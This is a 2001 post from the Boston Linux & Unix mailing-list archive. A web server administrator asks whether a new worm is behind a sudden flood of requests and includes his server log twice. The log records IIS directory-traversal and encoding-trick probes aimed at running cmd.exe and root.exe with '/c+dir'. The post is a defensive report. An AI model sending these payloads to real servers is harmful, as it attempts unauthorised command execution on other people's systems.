BLU Discuss list archive

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

new worm/virus???

Subject: new worm/virus???
From: Janicki at ia-inc.com (Chris Janicki)
Date: Tue, 18 Sep 2001 13:15:58 GMT

My web server is getting slammed with GET requests for cmd.exe, root.exe, 
etc.  It started this morning at 9:30am, and has been constant, and from 
all different sources.  I can't find any news on the web.  Does anyone 
know what's going on?

Below (and attached, to preserve line breaks) is a clip from my web logs. 
It shows all the various GET attempts from one source (nt1.mdc.net).  
I've informed mdc.net (a.k.a. "Netway" in N. Andover), but the attacks 
are widespread.



nt1.mdc.net - - [18/Sep/2001:09:52:21 -0400] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:21 -0400] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:21 -0400] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 1173
nt1.mdc.net - - [18/Sep/2001:09:52:20 -0400] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 1173
nt1.mdc.net - - [18/Sep/2001:09:52:20 -0400] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:20 -0400] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:20 -0400] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:20 -0400] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:20 -0400] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winn
t/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:20 -0400] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:20 -0400] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:20 -0400] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:20 -0400] "GET 
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:19 -0400] "GET 
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:18 -0400] "GET /MSADC/root.exe?/c+dir 
HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:18 -0400] "GET 
/scripts/root.exe?/c+dir HTTP/1.0" 404 1286
-------------- next part --------------

nt1.mdc.net - - [18/Sep/2001:09:52:21 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:21 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:21 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 1173
nt1.mdc.net - - [18/Sep/2001:09:52:20 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 1173
nt1.mdc.net - - [18/Sep/2001:09:52:20 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:20 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:20 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:20 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:20 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:20 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:20 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:20 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:20 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:19 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:18 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1286
nt1.mdc.net - - [18/Sep/2001:09:52:18 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1286

Follow-Ups:
- new worm/virus???
  - From: warlord at MIT.EDU (Derek Atkins)

Prev by Date: iptables advice needed
Next by Date: new worm/virus???
Previous by thread: Wireless LAN 802.11 Firmware and Driver Development
Next by thread: new worm/virus???
Index(es):
- Date
- Thread


BLU is a member of BostonUserGroups
We also thank MIT for the use of their facilities.

Boston Linux & Unix / webmaster@blu.org